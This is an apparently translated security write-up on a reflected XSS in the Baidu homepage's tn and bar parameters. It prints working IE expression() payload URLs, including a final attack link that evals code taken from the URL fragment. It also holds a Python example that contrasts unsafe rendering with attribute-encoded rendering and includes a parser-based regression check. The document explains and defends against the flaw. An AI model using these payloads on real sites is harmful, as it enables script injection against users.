Take an earlier XSS on the Baidu homepage as a demonstration. The flaw exists because the homepage's tn and bar parameters are not filtered strictly, which results in a parameter-based XSS:
http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert('XSS'));
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert('XSS'));
The tn and bar parameters are each output into the page as the value of a hidden input field. A " (double quote) closes the value attribute, and a CSS style property can then be appended to achieve cross-site scripting. The page's actual output looks like this:
<input type=hidden name=tn value=""/**/style=xss:expression(alert('XSS'));">
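To show why the quote breaks out and what the fix looks like, here is an added example (not Baidu's code; the templates are a hypothetical reconstruction of the vulnerable output shown above). render_unsafe reflects the parameter verbatim, render_safe attribute-encodes it with html.escape, and parsed_attributes uses Python's own HTML parser to list which attributes a parser actually sees in the resulting tag, so the injected style attribute is visible in the unsafe output and absent from the safe one:

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the same kind of value the page shows being
# reflected into the hidden input's value attribute.
TAINTED_TN = '"/**/style=xss:expression(alert(\'XSS\'));'


def render_unsafe(name: str, value: str) -> str:
    """Hypothetical reconstruction of the vulnerable template: the parameter
    is dropped into the attribute with no encoding, so a leading quote
    terminates the attribute and everything after it becomes new markup."""
    return f'<input type=hidden name={name} value="{value}">'


def render_safe(name: str, value: str) -> str:
    """Hardened version: html.escape(quote=True) turns " into &quot; and
    ' into &#x27;, so the value can no longer close the attribute. The
    attribute names are quoted as well so a stray / cannot start a new one."""
    return f'<input type=hidden name="{name}" value="{html.escape(value, quote=True)}">'


class _AttrCollector(HTMLParser):
    """Collects the attributes of the first <input> tag, as the parser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input" and not self.attrs:
            # Attribute values are entity-decoded by the parser, so a safely
            # encoded value round-trips back to the original string.
            self.attrs = dict(attrs)


def parsed_attributes(tag_html: str) -> dict:
    """Returns {attribute name: value} for the tag. In the unsafe rendering the
    parser treats the / after the closing quote as an attribute separator and
    reports a 'style' attribute; in the safe rendering only type/name/value exist."""
    collector = _AttrCollector()
    collector.feed(tag_html)
    collector.close()
    return collector.attrs


def attribute_injected(tag_html: str) -> bool:
    """True when an attribute that the template never wrote (style) shows up."""
    return "style" in parsed_attributes(tag_html)


if __name__ == "__main__":
    unsafe = render_unsafe("tn", TAINTED_TN)
    safe = render_safe("tn", TAINTED_TN)
    print(unsafe, attribute_injected(unsafe))   # True: style attribute injected
    print(safe, attribute_injected(safe))       # False: value stays inert text
```

The check in parsed_attributes is the one worth keeping in a regression test: rather than grepping the output for the string "expression(", which is still present in the encoded value, it asks what attributes a parser ends up with, which is the question that decides whether the attribute context was escaped.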
This vulnerability only works in IE. Firefox encodes a " (double quote) in the URL parameter as %22, so the page outputs %22 as well and the quote cannot close the attribute for cross-site scripting. expression() is an unruly construct: IE re-evaluates it continuously, so the injected code runs in an endless loop. A small trick gets rid of that annoying loop. First, run the code that follows the # (the fragment) of the current URL:
eval(unescape(location.hash.substr(1)))
Then define a property on the window object and test it, so that the code runs only once:
(window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1
The final, polished attack link is:
http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%29
A typical parameter-based cross-site scripting vulnerability.